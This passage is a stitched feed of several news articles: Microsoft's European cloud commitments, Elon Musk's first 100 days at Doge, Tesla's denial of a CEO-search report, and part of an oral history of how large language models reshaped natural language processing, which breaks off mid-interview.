"In a time of geopolitical volatility, we are committed to providing digital stability. That is why today Microsoft is announcing five digital commitments to Europe. These start with an expansion of our cloud and AI infrastructure in Europe, aimed at enabling every country to fully use these technologies to strengthen their economic competitiveness. And they include a promise to uphold Europe’s digital resilience regardless of geopolitical and trade volatility."
Microsoft was "pleased," he says, that the Trump administration and the European Union bloc had agreed to "suspend further tariff escalation" as officials "negotiate a reciprocal trade agreement" to "resolve tariff issues and reduce non-tariff barriers."
The direction of travel by the US government has created nervousness among some European customers. Trump appears to treat his allies like his historic enemies and relationships are unravelling. Microsoft generates around a quarter of its revenues in Europe and so has a vested financial interest in overcoming any unease from customers in the region.
With this in mind, Microsoft has a five-point plan to ameliorate growing alarm, starting with a pledge to "increase our European datacenter capacity by 40 percent over the next two years," Smith says in his post.
"We are expanding datacenter operations in 16 European countries. When combined with our
recent construction
, the plans we're announcing today will more than double our European datacenter capacity between 2023 and 2027. It will result in cloud operations in more than 200 datacenters across the continent."
"This includes," in its public cloud bit barns, "the Microsoft Cloud for Sovereignty, a package of technologies and configurations to help governments and other customers run on Azure in our public cloud datacenters with greater control over data location, encryption, and administrative access."
Techies in Europe – who obviously have a vested interest in unsettling Microsoft's stronghold on the market, as AWS, Microsoft, and Google have upwards of a 70 percent share of the public cloud sector in the region – previously highlighted the potential dangers of US legislation.
Frank Karlitschek, CEO of Nextcloud, told us in March: "The Cloud Act grants US authorities access to cloud data hosted by US companies. It does not matter if that data is located in the US, Europe, or anywhere else."
Not everyone shares those concerns, but enough do that the issue is sparking conversations about business risk.
Mark Boost, CEO at UK cloud provider Civo, told us today: "In the last few weeks, cloud users' interest in data sovereignty has surged. Almost overnight, it has shifted from nice-to-have to a strategic necessity."
He claimed the tariff debacle had forced many businesses to "reconsider their relationships with large US cloud providers. Organisations across the board, especially in regulated industries, are more aware than ever about how their data is used, transferred, and stored. Regaining control over that process is vital to remaining compliant and secure in a global tech economy that's constantly shifting."
"While the CLOUD Act remains in force, enterprises and governments simply cannot trust US hyperscalers to keep their data fully private, regardless of the physical location of their infrastructure."
Doubling down, Smith at Microsoft says: "Microsoft is committed to helping Europe navigate the uncertain geopolitical and trade environment and better manage risk by strengthening the continent’s digital resilience.
"We also are listening closely to the views of European governments and leaders. We recognize that European countries, like nations everywhere, need to have rock-solid confidence in the digital infrastructure on which they rely."
With this in mind, he says Microsoft's European datacenter ops will be "overseen by a European board of directors that consists exclusively of European nationals and operates under European law."
Smith says Microsoft is no stranger to pursuing litigation to "protect the rights of our customers and other stakeholders", pointing to four lawsuits filed against the US Executive Branch when President Obama was in office, and to a Supreme Court ruling during Trump's first term that upheld the rights of employees who are immigrants.
"When necessary, we're prepared to go to court," he says. "We are confident of our legal rights to ensure continuous operation of our datacenters in Europe. And we are prepared to back this confidence with our contractual commitments to European governments."
To reinforce this claim, Smith says Microsoft will also "designate and rely" upon European partners "with contingency arrangements for operational continuity in the unlikely event Microsoft were ever required by a court to suspend services. We are already enabling our partners in France and Germany to do this for the Bleu and Delos datacenters, and we will pursue arrangements for our public cloud datacenters in Europe.
"We will store backup copies of our code in a secure repository in Switzerland, and we will provide our European partners with the legal rights needed to access and use this code if needed for this purpose."
Smith is also talking up efforts to protect the privacy of European data as Microsoft, he says, lets customers choose where their data is stored and processed, how it is encrypted and secured and when Microsoft can access it.
With regard to cybersecurity, Smith says Microsoft will appoint a Deputy CISO for Europe on its Cybersecurity Governance Council, build on its Secure Future Initiative, and dedicate more resources to complying with the Cyber Resilience Act.
"Security is the foundation of trust. To sustain that trust, we will engage an independent auditor to verify and validate our commitments to Europe."
The final part of Microsoft's five-point plan may make some readers spill their coffee, assuming they are reading this with their morning brew on the US East Coast or at lunchtime in Europe. Microsoft is going to "strengthen Europe's economic competitiveness, including for open source."
Smith didn't announce much new here, saying Microsoft will "introduce new enhancements" to its AI Access Principles. The principles have, he claims, ensured the Azure AI platform is "open to a variety of business models — both open source and proprietary." Microsoft hosts 1,800 AI models. And he recounts how Microsoft last year eliminated egress fees, albeit under pressure from UK watchdog the Competition and Markets Authority. Some onlookers, however, feel this was more of a marketing move than actual substance, as egress fees only matter to a small portion of customers.
Corey Quinn, chief cloud economist at The Duckbill Group, said in March last year when Microsoft ditched egress fees: "It's marketing [that] makes new customers feel better. Wildly expensive egress mostly hurts ongoing usage; nobody stays locked in because of egress."
Microsoft this month celebrated its 50th anniversary, and the tenor of today's blog encapsulates the existential threat that Smith's employer faces in Europe. The longer Trump's unpredictable policies unsettle customers on the European side of the pond, the more action will be needed.
When profits are under threat, shareholders start to get twitchy. ®
Guido Günther: Free Software Activities April 2025
PlanetDebian
honk.sigxcpu.org
2025-05-01 10:06:55
Another short status update of what happened on my side last month.
Notable might be the Cell Broadcast support for Qualcomm SoCs, the
rest is smaller fixes and QoL improvements.
phosh
Fix splash spinner icon regression with newer GTK >= 3.24.49 (MR)
Update adaptive app list (MR)
Fix missing i...
Move fast and destroy things: 100 chaotic days of Elon Musk in the White House
Guardian
www.theguardian.com
2025-05-01 10:00:21
From mass firings to unprecedented influence, Musk has left little of the federal government untouched in Doge role One hundred days after Elon Musk entered the White House as Donald Trump’s senior adviser and the de facto leader of the so-called “department of government efficiency” (Doge), the Tes...
One hundred days after Elon Musk entered the White House as Donald Trump’s senior adviser and the de facto leader of the so-called “department of government efficiency” (Doge), the Tesla CEO has left little of the federal government unscathed. Over the course of just a few months, he has gutted agencies and public services that took decades to build while accumulating immense political power.
Musk’s role in the Trump administration is without modern precedent. Never before has the world’s richest person been deputized by the US president to cull the very agencies that oversee his businesses. Musk’s attempts to radically dismantle government bureaus have won him sprawling influence. His team has embedded its members in key roles across federal agencies, gained access to personal data on millions of Americans and fired tens of thousands of workers. SpaceX, where he is CEO, is now poised to take over potential government contracts worth billions. He has left a trail of chaos while seeding the government with his allies, who will likely help him profit and preserve his newfound power.
The billionaire’s newfound sway has not come without pushback and a cost. Doge’s blitz through the government has sparked furious nationwide backlash, as well as dozens of lawsuits challenging Musk’s mass firings and accusing his task force of violating numerous laws. Musk’s personal popularity has sunk to record lows, and Tesla’s profits have tanked.
A look back at the first 100 days of the Trump administration shows the extent to which Musk’s efforts have changed the US government. It also shows that what Musk framed as a cost-cutting initiative is failing to meet its ostensible goal of finding $1tn in fraud or waste, but it is succeeding in reshaping federal agencies along ideological grounds, paving the way for private companies to fill the resulting vacuum of public services.
Musk has recently stopped physically working from the White House and stated he plans to pivot away from his government position soon, but he has entrenched himself as one of the world’s most divisive political figures and gives no sign he is willing to fully give up his influence. Instead, the first 100 days of Doge show that the scope of Musk’s ambition extends to remaking how the government deals with everything from humanitarian aid to the rule of law.
Doge sweeps through agencies
On the same day Trump was sworn into office, the president issued an executive order that created Musk’s “department of government efficiency” by renaming the US Digital Service agency, which previously handled governmental tech issues. Trump’s order included only a vague mandate to modernize government technology and increase efficiency, but within days it would become clear that Musk and his team had far more expansive aims.
In the months leading up to the executive order, Musk had been hiring a team of staffers that included a mix of young engineers, tech world executives and longtime lieutenants from his private companies. Running the day-to-day operations was Steve Davis, who had worked with Musk at various companies, including SpaceX and the Boring Company, for more than 20 years. Davis was known as an exacting boss – Musk once compared him to chemotherapy. Others had far less experience, including 19-year-old Edward Coristine, who had worked for several months at Musk’s Neuralink company. The teenager had been fired from a previous internship for leaking information and went by the username “big balls” in online profiles.
Doge’s early days made headlines for targeting masses of government workers with layoffs and pushing others to resign, with more than 2 million employees receiving an email on 28 January titled “Fork in the road” that encouraged staffers to take a buyout. The emails, which asked: “What did you accomplish this week?” would become a signature of Musk and his new bureau, sent again and again whenever Doge staff began to prey on a new herd of government employees.
Shortly after Trump’s executive order created Doge, Musk’s team quickly began popping up in the offices of numerous agencies. One of the first was the General Services Administration, which oversees digital technology and government buildings. Doge staffers appeared on Zoom calls with no introduction and hidden last names, questioning federal employees about what they did for work and refusing to answer questions. They also began to show up in person, taking over conference rooms and moving Ikea beds on to the sixth floor of the GSA to sleep overnight. Perplexed government workers at numerous agencies described Doge’s actions as a hostile takeover, where a goon squad would appear and demand rapid changes to systems they knew little about.
“They’ve only fired people and turned things off,” said a current federal employee, who agreed to speak anonymously for fear of retribution.
Simultaneously, Doge staffers were aggressively gaining access to key data systems that controlled the flow of payments to federal workers and funding for government contracts. In one striking incident, Doge team members clashed with the highest-ranking career official at the treasury department over access to a payment system that controls $6tn in annual funds. The fight ended with the official, David Lebryk, being put on administrative leave before he ultimately resigned. Doge staff obtained the access they wanted.
Pushback against Doge from other officials resulted in similar punishments. As Doge staffers stormed into the United States Agency for International Development (USAID) in early February, they found themselves in a heated standoff with security officials who tried to bar them from accessing a secure room which held sensitive and confidential data. The confrontation ended with USAID’s top security official being put on administrative leave, while Doge gained access to its systems. With no one to stop them, Doge staffers then began the process of hollowing out the agency that had once been the world’s largest single supplier of humanitarian aid. More than 5,600 USAID workers around the world would be fired in the ensuing weeks.
“We spent the weekend feeding USAID into the wood chipper,” Musk boasted days later on X, his social media platform.
Musk moves to gut the government
Doge’s targeting of USAID turned out to be a blueprint for how Musk and company would go after other parts of the government. In early February, Musk’s team had established a presence across federal agencies and placed itself at the fulcrum of government employment systems. The next step was mass layoffs.
“We do need to delete entire agencies,” Musk told attendees at a World Governments Summit in Dubai on 13 February. “If we don’t remove the roots of the weed, then it’s easy for the weed to grow back.”
The same day as Musk’s remarks, the Trump administration ordered agencies to fire thousands of probationary workers – a designation that applies to employees who have been at their jobs for less than a year, including those who may have been recently promoted. Other workers soon received an email from Doge that demanded they list five things that they did last week or face termination, a chaotic request that also turned out to be an empty threat. Cabinet officials privately deemed it nonsensical.
Amid the widespread cuts, Musk began reveling in his new powers both on X and in public appearances. At the Conservative Political Action Conference (CPAC) on 23 February he stood on stage in a black Maga hat, sunglasses and gold chain, gleefully wielding a chainsaw that was gifted to him by Javier Milei, the rightwing populist Argentinian president.
“This chainsaw is for bureaucracy!” he said. “I am become meme.”
While Musk celebrated his first cuts, Doge began going after entire offices and agencies it viewed as politically progressive or opposed to its goals. The GSA’s 18F office, which helped build software projects such as the IRS’s free tax filing service, was one of the first targets. On 3 February, Musk told a rightwing influencer on X that the office was “deleted” in response to an inaccurate post accusing the group of being radical leftists. Employees at the 18F office asked their new Musk-allied leadership what “deleted” meant, former workers said, but received no further clarification. The employees continued working for weeks under a cloud of confusion and tension with their new leaders, until the middle of the night on Saturday 1 March, when they received an email saying they were going to be laid off en masse.
“We were living proof that the talking points of this administration were false. Government services can be efficient,” Lindsay Young, the former executive director of 18F, said in a post on LinkedIn. “This made us a target.”
Doge’s influence soon extended beyond government tech offices into major agencies such as the Department of Health and Human Services, which announced in March that it was cutting 10,000 jobs to align with Trump’s executive order on Doge. In a display of the chaos that Doge had inspired, US health secretary Robert F Kennedy Jr weeks later admitted that around 2,000 of those workers were fired in error and would need to be reinstated.
Musk fights the judicial system
As soon as Trump issued the executive order to create Doge, watchdog and labor groups filed lawsuits challenging its legality. More lawsuits piled on as Doge accessed sensitive data systems, fired workers and refused to respond to public records requests. Altogether, there have now been more than two dozen cases targeting the agency.
At first, Doge and Musk seemed to move faster than the judicial system could respond as they slashed and burned government agencies. Around the start of March, however, many of the court cases began to produce rulings that curtailed Doge’s layoffs and temporarily blocked its staff’s access to data. Judges ruled that the Trump administration needed to reinstate probationary workers that it had fired, limited some Doge access to databases at agencies such as the Social Security Administration and ordered Musk’s team to turn over internal records it had been seeking to keep private.
Musk’s reaction was a constant stream of attacks against the judicial system on X, which included demands that lawmakers “impeach the judges” and claims that there was a “judicial coup” under way against Trump. Musk repeatedly amplified far-right influencers saying that the US should emulate El Salvador’s strongman president, Nayib Bukele, whose party ousted supreme court judges in 2021 in a slide toward authoritarianism.
While Musk campaigned against federal judges who were increasing oversight and forcing more transparency on Doge, he also began plowing money into a Wisconsin supreme court race that would have tipped the state’s judicial body conservative. The billionaire and the groups he funded put more than $20m toward electing a conservative judge, which he claimed was crucial to “the future of civilization”.
The attempt to influence the Wisconsin vote followed his blueprint from the presidential race. His Super Pac offered $100 to voters willing to sign a petition stating their opposition to “activist judges”, and he held a campaign rally where he gave out $1m checks on stage. Musk’s effort failed to convince voters, with his preferred candidate losing by 10 percentage points.
The outcome of the Wisconsin supreme court race proved to be the first in a series of setbacks that tested the limits of Musk’s political influence and the toxicity of his personal brand. As the billionaire embraced his new role as a Republican mega-donor and placed himself often literally at center stage, it became clear that his routine did not always play well outside of the insulated bubbles of Maga rallies and Tesla product launches. While people saw more and more of Musk, polls showed that the public liked him less and less.
Protests boom against Musk and Tesla
As Musk’s association with Trump and the international far right became too prominent to ignore over the past year, there has been a rising social stigma against associating with his products. The most tangible symbol of Musk’s empire, Tesla, has become the focus of an international protest movement since the creation of Doge. SpaceX, the second-largest source of Musk’s wealth, has seemed insulated from the vicissitudes of consumer sentiment and increased its role in US space operations.
Protests at Tesla dealerships, as well as vandalism against individual cars, started small in the weeks after inauguration, with gatherings of a few dozen people in cities including New York City and San Francisco. Some Tesla owners sold their cars due to the association with Musk or placed “I bought this before we knew Elon was crazy” bumper stickers on their vehicles. The demonstrations quickly escalated to more cities, though, organizing under the banner of “Tesla Takedown” protests that targeted showrooms around the country.
By mid-March, a fully fledged international protest movement against Tesla and Musk had formed and brought about mass protests. Thousands of people gathered at showrooms from Sydney to San Francisco on 30 March in a day of action, with organizers stating that “hurting Tesla is stopping Musk”. Vandalism against Tesla dealerships, charging stations and cars also intensified around the world, including multiple molotov cocktail attacks and incidents of arson. Trump and Musk called the attacks domestic terrorism, while Pam Bondi, the attorney general, vowed to crack down on anyone targeting Tesla.
The pressure on Tesla represented a real threat to the company, which was already dealing with an overall sluggish market for electric vehicles and increased competition from Chinese automakers. As protests spread, Musk leaned on his status in Maga world to attempt to revitalize the brand.
Trump appeared on the White House driveway in front of several parked Teslas, telling reporters that he was going to buy one of them and praising Musk as a “patriot”. Others in Trump’s orbit, including Fox News host Sean Hannity, also posted sales pitches for the automaker.
Despite praise from Trump and Musk’s assurances to workers and investors that they should not sell Tesla stock, analysts reported that the protests, along with other economic issues, were nevertheless taking a toll. A stock selloff has resulted in Tesla’s share price falling around 25% since the start of the year, wiping billions of dollars from Musk’s net worth. A first-quarter earnings call on 22 April revealed Tesla’s performance was even worse than expected, with a 71% drop in profits and a 9% drop in revenue year over year.
Musk announced on the call that he would spend significantly less time working on Doge starting sometime in May.
Musk eyes an exit, but Doge remains
Musk’s declaration that he would pare back his time with Doge to one or two days a week gave a more definitive sense of his exit after weeks of speculation about when and how he would leave the White House. Although Trump has remained adamant that Musk is doing a good job and remains welcome in the administration, a growing chorus of top officials have either openly feuded with him or privately griped about his presence throughout his first 100 days.
Musk has had intense clashes with secretary of state Marco Rubio, transportation secretary Sean Duffy and several other top Trump staffers. He reportedly got into a near-physical shouting match with treasury secretary Scott Bessent in recent weeks, and has publicly called chief trade adviser Peter Navarro, the architect of Trump’s tariff policies, “dumber than a sack of bricks”.
The power struggles between Musk and administration officials leave it unclear how much say Doge will have without Musk constantly placed at the right hand of the president, but his allies are still spread throughout the government and actively working on carrying out his mission. Doge has continued to target agencies throughout April, gutting smaller groups such as an agency that coordinates government policy on homelessness, and eyeing others, including the Peace Corps, for mass layoffs.
Some of Doge’s cuts have directly targeted agencies that oversee Musk’s companies, including the National Highway Traffic Safety Administration, which regulates and investigates the risks of self-driving cars. Shifts in priorities and leadership at agencies such as Nasa and the Pentagon also put SpaceX in a position to potentially make billions off of new contracts, while former government employees say it is likely Doge already has access to confidential business data on SpaceX’s competitors.
While part of the Doge team is still finding workers to fire, other members have begun accessing even more data systems and are starting to put them to work. One target has been immigration, where Doge staff have accessed personal information that includes therapy records for unaccompanied migrant children, housing information and biometric data. The goal, multiple outlets have reported, is to create a master database that could be used to enforce the Trump administration’s deportations and other anti-immigration maneuvers.
Mission accomplished?
As Doge’s purpose has become more amorphous over its first three months, its initially advertised goal of cutting $1-2tn from the budget has moved further from view. Musk has instead shifted the goalposts, saying that he expects to find $150bn in savings this year – a fraction of his original goal and a small dent in the overall federal budget. That number may also be an illusion, as Doge’s tally of its savings has been filled with constant errors and miscalculations. Much of Doge’s savings could also be erased by the costs of defending itself in court and losses associated with its mass layoffs.
The real effects of Doge’s first 100 days are still playing out. Dismantling USAID is projected to cause around 176,000 excess deaths, more than half of them children, according to a Boston University tracking project. Cuts to agencies such as the National Oceanic and Atmospheric Administration and the Federal Emergency Management Agency could imperil natural disaster forecasting and relief. Agencies such as Veterans Affairs that provide public services may deteriorate, while cuts to research and education programs may be felt for decades to come.
“The amazing thing is that they haven’t actually done anything constructive whatsoever. Literally all they’ve done is destroy things,” a current federal employee said of Doge. “People are going to miss the federal government that they had.”
Tesla denies report claiming board looked to replace Elon Musk
Guardian
www.theguardian.com
2025-05-01 09:03:11
Wall Street Journal article saying headhunters were contacted branded ‘absolutely false’ by chair Robyn Denholm Tesla has denied a report that its board sought to replace Elon Musk as its chief executive amid a backlash against his rightwing politics and declining car sales. Robyn Denholm, the chair...
Tesla has denied a report that its board sought to replace Elon Musk as its chief executive amid a backlash against his rightwing politics and declining car sales.
Robyn Denholm, the chair of the board at the electric carmaker, said in a statement on Tesla’s social media account on X: “Earlier today, there was a media report erroneously claiming that the Tesla Board had contacted recruitment firms to initiate a CEO search at the company.
“This is absolutely false (and this was communicated to the media before the report was published). The CEO of Tesla is Elon Musk and the Board is highly confident in his ability to continue executing on the exciting growth plan ahead.”
Tesla CEO Elon Musk. Photograph: Evelyn Hockstein/Reuters
It followed a Wall Street Journal story published on Wednesday that claimed “board members” had contacted headhunters to recruit a successor about a month ago.
It is unclear in the report whether these members were acting on behalf of the board as a collective, or if it was only some of them taking steps to find a new chief executive. The Tesla board is made up of eight people, including Elon Musk himself, his brother, Kimbal Musk, and James Murdoch, son of media mogul Rupert Murdoch.
Tesla has been hit by a widespread backlash against Musk’s recent political activity, not only against his Doge work but also against his public support for the far-right Alternative for Germany (AfD) party before German national elections in February. Sales of its electric cars have dropped in some of its biggest markets and there have been political protests at some of its showrooms.
Last week, the company reported that profits had dropped by 71% in the first quarter of this year to $409m (£307m), compared with $1.39bn in the same period in 2024. Meanwhile, Tesla’s stock has suffered, with the company losing about a quarter of its market value this year.
Musk told investors that starting from May he would be “allocating far more of my time to Tesla”.
He is scheduled to leave Doge on 30 May, according to a strict 130-day cap on his service as a special government employee.
There have long been concerns around the demands on Musk’s time. As well as Tesla, he oversees four other companies, including the space exploration company SpaceX and the social media platform X, formerly known as Twitter.
Musk denounced the Wall Street Journal report on X on Thursday. He wrote: “It is an EXTREMELY BAD BREACH OF ETHICS that the @WSJ would publish a DELIBERATELY FALSE ARTICLE and fail to include an unequivocal denial beforehand by the Tesla board of directors!”
When ChatGPT Broke an Entire Field: An Oral History
Something very significant has happened to the field.
And also to people.
—Christopher Potts
Asking scientists to identify a paradigm shift, especially in real time, can be tricky. After all, truly ground-shifting updates in knowledge may take decades to unfold. But you don’t necessarily have to invoke the P-word to acknowledge that one field in particular — natural language processing, or NLP — has changed. A lot.
The goal of natural language processing is right there on the tin: making the unruliness of human language (the “natural” part) tractable by computers (the “processing” part). A blend of engineering and science that dates back to the 1940s, NLP gave Stephen Hawking a voice, Siri a brain and social media companies another way to target us with ads. It was also ground zero for the emergence of large language models — a technology that NLP helped to invent but whose explosive growth and transformative power still managed to take many people in the field entirely by surprise.
To put it another way: In 2019, Quanta reported on a then-groundbreaking NLP system called BERT without once using the phrase “large language model.” A mere five and a half years later, LLMs are everywhere, igniting discovery, disruption and debate in whatever scientific community they touch. But the one they touched first — for better, worse and everything in between — was natural language processing. What did that impact feel like to the people experiencing it firsthand?
Quanta interviewed 19 current and former NLP researchers to tell that story. From experts to students, tenured academics to startup founders, they describe a series of moments — dawning realizations, elated encounters and at least one “existential crisis” — that changed their world. And ours.
* * *
Prologue: Before the Flood
transformers • BERTology • scale
By 2017, neural networks had already changed the status quo in NLP. But that summer, in a now-seminal paper titled “Attention Is All You Need,” researchers at Google introduced an entirely new kind of neural network called the transformer that would soon dominate the field. Not everyone saw it coming.
ELLIE PAVLICK (assistant professor of computer science and linguistics, Brown University; research scientist, Google DeepMind):
Google had organized a workshop in New York for academics to hang out with their researchers, and Jakob Uszkoreit, one of the authors on that paper, was presenting on it. He was making a really clear point about how aggressively this model was not designed with any insights from language. Almost trolling a bit: I’m going to just talk about all these random decisions we made, look how absurd this is, but look how well it works.
There had already been a feeling of the neural nets taking over, and so people were very skeptical and pushing back. Everyone’s main takeaway was, “This is all just hacks.”
RAY MOONEY (director, UT Artificial Intelligence Laboratory, University of Texas at Austin):
It was sort of interesting, but it wasn’t an immediate breakthrough, right? It wasn’t like the next day the world changed. I really do think it’s not conceptually the right model for how to process language. I just didn’t realize that if you trained that very conceptually wrong model on a lot of data, it could do amazing things.
NAZNEEN RAJANI (founder and CEO, Collinear AI; at the time a Ph.D. student studying with Ray Mooney):
I clearly remember reading “Attention Is All You Need” in our NLP reading group. Ray actually ran it, and we had this very lively discussion. The concept of attention had been around for a while, and maybe that’s why Ray’s reaction was kind of, “Meh.” But we were like, “Wow, this seems like a turning point.”
R. THOMAS MCCOY (assistant professor, department of linguistics, Yale University):
During that summer, I vividly remember members of the research team I was on asking, “Should we look into these transformers?” and everyone concluding, “No, they’re clearly just a flash in the pan.”
CHRISTOPHER POTTS (chair, department of linguistics, Stanford University):
The transformers paper passed me by. Even if you read it now, it’s very understated. I think it would be very hard for anyone to tell from the paper what effect it was going to have. That took additional visionary people, like the BERT team.
Soon after it was introduced in October 2018, Google’s open-source transformer BERT (and a lesser-known model from OpenAI named GPT) began shattering the performance records set by previous neural networks on many language-processing tasks. A flurry of “BERTology” ensued, with researchers struggling to determine what made the models tick while scrambling to outdo one another on benchmarks — the standardized tests that helped measure progress in NLP.
ANNA ROGERS (associate professor of computer science, IT University of Copenhagen; editor-in-chief, ACL Rolling Review):
There was this explosion, and everybody was writing papers about BERT. I remember a discussion in the [research] group I was in: “OK, we will just have to work on BERT because that’s what’s trending.” As a young postdoc, I just accepted it: This is the thing that the field is doing. Who am I to say that the field is wrong?
JULIAN MICHAEL (head of the safety, evaluations and alignment lab, Scale AI; at the time a Ph.D. student at the University of Washington):
So many projects were dropped on the floor when BERT was released. And what happened next was, progress on these benchmarks went way faster than expected. So people are like, “We need more benchmarks, and we need harder benchmarks, and we need to benchmark everything we can.”
Some viewed this “benchmark boom” as a distraction. Others saw in it the shape of things to come.
SAM BOWMAN (member of technical staff, Anthropic; at the time an associate professor at New York University):
When people submitted benchmark results and wanted to appear on the leaderboard, I was often the one who had to check the result to make sure it made sense and wasn’t just someone spamming our system. So I was seeing every result come in, and I was noticing how much of it was just, increasingly, old or simple ideas scaled up.
JULIAN MICHAEL:
It became a scaling game: Scaling up these models will increase their ability to saturate any benchmark we can throw at them. And I’m like, “OK, I don’t find this inherently interesting.”
SAM BOWMAN:
The background assumption was, “Transformers aren’t going to get much better than BERT without new breakthroughs.” But it was becoming clearer and clearer for me that scale was the main input to how far this is going to go. You’re going to be getting pretty powerful general systems. Things are going to get interesting. The stakes are going to get higher.
So I got very interested in this question: All right, what happens if you play that out for a few years?
* * *
I. The Wars of the Roses (2020–22)
“understanding wars” • GPT-3 • “a field in crisis”
As transformer models approached (and surpassed) “human baselines” on various NLP benchmarks, arguments were already brewing about how to interpret their capabilities. In 2020, those arguments — especially about “meaning” and “understanding” — came to a head in a paper imagining an LLM as an octopus.
EMILY M. BENDER (professor, department of linguistics, University of Washington; 2024 president, Association for Computational Linguistics):
I was having these just unending arguments on Twitter, and grumpy about it. There was one about using BERT to unredact the Mueller report, which is a terrible idea. It seemed like there was just a never-ending supply of people who wanted to come at me and say, “No, no, no, LLMs really do understand.” It was the same argument over and over and over again.
I was talking with [computational linguist] Alexander Koller, and he said: “Let’s just write the academic paper version of this so that it’s not just ideas on Twitter, but peer-reviewed research. And that’ll put an end to it.” It did not put an end to it.
Bender and Koller’s “octopus test” asserted that models trained only to mimic the form of language through statistical patterns could never engage with its meaning — much as a “hyperintelligent octopus” would never really understand what life was like on land, even if it fluently reproduced the patterns it observed in human messages.
SAM BOWMAN:
This argument — that “there’s nothing to see here,” that neural network language models are fundamentally not the kind of thing that we should be interested in, that a lot of this is hype — that was quite divisive.
JULIAN MICHAEL:
I got involved in that. I wrote this takedown of the paper — it was the one blog post I’ve ever written, and it was the length of a paper itself. I worked hard to make it a good-faith representation of what the authors were saying. I even got Emily to read a draft of my post and correct some of my misunderstandings. But if you read between the lines, I am eviscerating. Just with a smile on my face.
ELLIE PAVLICK:
These “understanding wars” — to me, that’s when a reckoning was really happening in the field.
Meanwhile, another reckoning — driven by real-world scale, not thought experiments — was already underway. In June of 2020, OpenAI released GPT-3, a model more than 100 times as large as its previous version and much more capable. ChatGPT was still years away, but for many NLP researchers, GPT-3 was the moment when everything changed. Now Bender’s octopus was real.
CHRISTOPHER CALLISON-BURCH (professor of computer and information science, University of Pennsylvania):
I got early access to the GPT-3 beta and was actually playing with it myself. I’m trying out all the things that my recent Ph.D. students had done as their dissertations, and just realizing — oh my God, the thing that had taken a student five years? Seems like I could reproduce that in a month. All these classical NLP tasks, many of which I had touched on or actively researched throughout my career, just felt like they worked in one shot. Like, done. And that was just really, really shocking. I sometimes describe it as having this career-existential crisis.
NAZNEEN RAJANI:
When I tried GPT-3 out, it had a lot of limitations around safety. When you asked questions like, “Should women be allowed to vote?” it would say no, and things like that. But the fact that you could just teach it to do a completely new task in, like, three or four lines of natural language was mind-boggling.
CHRISTOPHER POTTS:
Somebody in our group got early access to the GPT-3 API. And I remember standing in my office, right where I’m standing now, thinking: I’m going to prompt it with some logic questions and it’s going to fail at them. I’m going to reveal that it has just memorized all the things that you’re so impressed by. I’m going to show you that this is a party trick.
I remember trying, and trying again. Then I had to fess up to the group: “Yeah, this is definitely much more than a party trick.”
YEJIN CHOI (professor of computer science, Stanford University; 2022 MacArthur fellow):
It was still broken. A lot of commonsense knowledge [coming] out of GPT-3 was quite noisy. But GPT-2 was near zero — it was no good. And GPT-3 was about two-thirds good, which I found was quite exciting.
R. THOMAS MCCOY:
This GPT-3 paper was sort of like the series finale of “Game of Thrones.” It was the thing that everyone had just read and everyone was discussing and gossiping about.
LIAM DUGAN (fourth-year Ph.D. student, University of Pennsylvania):
It almost was like we had a secret, and everyone you shared it with was blown away. All I had to do was bring someone over to my laptop.
JULIAN MICHAEL:
BERT was a phase transition in the field, but GPT-3 was something more visceral. A system that produces language — we all know the ELIZA effect, right? It creates a much stronger reaction in us. But it also did more to change the practical reality of the research that we did — it’s like, “In theory, you can do anything [with this].” What are the implications of that? This huge can of worms opened up.
OpenAI did not publicly release GPT-3’s source code. The combination of massive scale, disruptive capability and corporate secrecy put many researchers on edge.
SAM BOWMAN:
It was a bit of a divisive moment because GPT-3 was not really coming from the NLP community. It was really frowned upon for a while to publish results of studies primarily about GPT-3 because it was [seen as] this private artifact where you had to pay money to access it in a way that hadn’t usually been the case historically.
ANNA ROGERS:
I was considering making yet another benchmark, but I stopped seeing the point of it. Let’s say GPT-3 either can or cannot continue [generating] these streams of characters. This tells me something about GPT-3, but that’s not actually even a machine learning research question. It’s product testing for free.
JULIAN MICHAEL:
There was this term, “API science,’’ that people would use to be like: “We’re doing science on a product? This isn’t science, it’s not reproducible.” And other people were like: “Look, we need to be on the frontier. This is what’s there.”
TAL LINZEN (associate professor of linguistics and data science, New York University; research scientist, Google):
For a while people in academia weren’t really sure what to do.
This ambivalence was even shared by some within industry labs such as Microsoft, which exclusively licensed GPT-3, and Google.
KALIKA BALI (senior principal researcher, Microsoft Research India):
The Microsoft leadership told us pretty early on that this was happening. It felt like you were on some rocket being thrown from Earth to the moon. And while [that] was very exciting, it was going at a pace that meant you really had to look at all your navigation instruments to make sure you’re still headed in the right direction.
EMILY M. BENDER:
Timnit Gebru [at the time, an AI ethics researcher at Google] approached me in a Twitter DM exchange, asking if I knew of any papers about the possible downsides of making language models bigger and bigger. At Google, she saw people around her constantly pushing: “OpenAI’s is bigger. We’ve got to make ours bigger.” And it was her job to say, “What could go wrong?”
The paper that Bender subsequently wrote with Gebru and her colleagues — “On the Dangers of Stochastic Parrots: Can Language Models Be Too Big?” — injected moral urgency into the field’s core (and increasingly sore) arguments around form versus meaning and method versus scale. The result was a kind of civil war in NLP.
KALIKA BALI:
Some of the points that Emily makes are things that we should be thinking about. That was the year that the NLP community suddenly decided to worry about how it had neglected everything except the top five languages in the world — nobody ever talked about these things earlier. But what I did not like was that the entire NLP community kind of organized themselves for and against the paper.
R. THOMAS MCCOY:
Are you pro- or anti-LLM? That was in the water very, very much at this time.
JULIE KALLINI (second-year computer science Ph.D. student, Stanford University):
As a young researcher, I definitely sensed that there were sides. At the time, I was an undergraduate at Princeton University. I remember distinctly that different people I looked up to — my Princeton research adviser [Christiane Fellbaum] versus professors at other universities — were on different sides. I didn’t know what side to be on.
KALIKA BALI:
It was positive that that paper came out, but it was also stressful to see people that you really respect drawing swords at each other. I actually went off Twitter. I got stressed about it.
LIAM DUGAN:
As a Ph.D. student, the tension arises: If you want to do research that has any sort of lasting impact more than two or three years after you publish, you kind of have to take a side. Because it dictates so much of the way that you even look at problems.
I regularly read people from both sides. Usually you just subscribed to Substacks to see the angry linguistics side, and you’d go on Twitter to see the pro-scaling side.
JEFF MITCHELL (assistant professor in computer science and AI, University of Sussex):
It felt a little abnormal, quite how controversial that all became.
As scale-driven research continued to accelerate, some felt that discourse within the field was seriously deteriorating. In an attempt to repair it, the NLP research community surveyed itself in the summer of 2022 on “30 potentially controversial positions” — including “Linguistic structure is necessary,” “Scaling solves practically any important problem” and “AI could soon lead to revolutionary societal change.”
SAM BOWMAN:
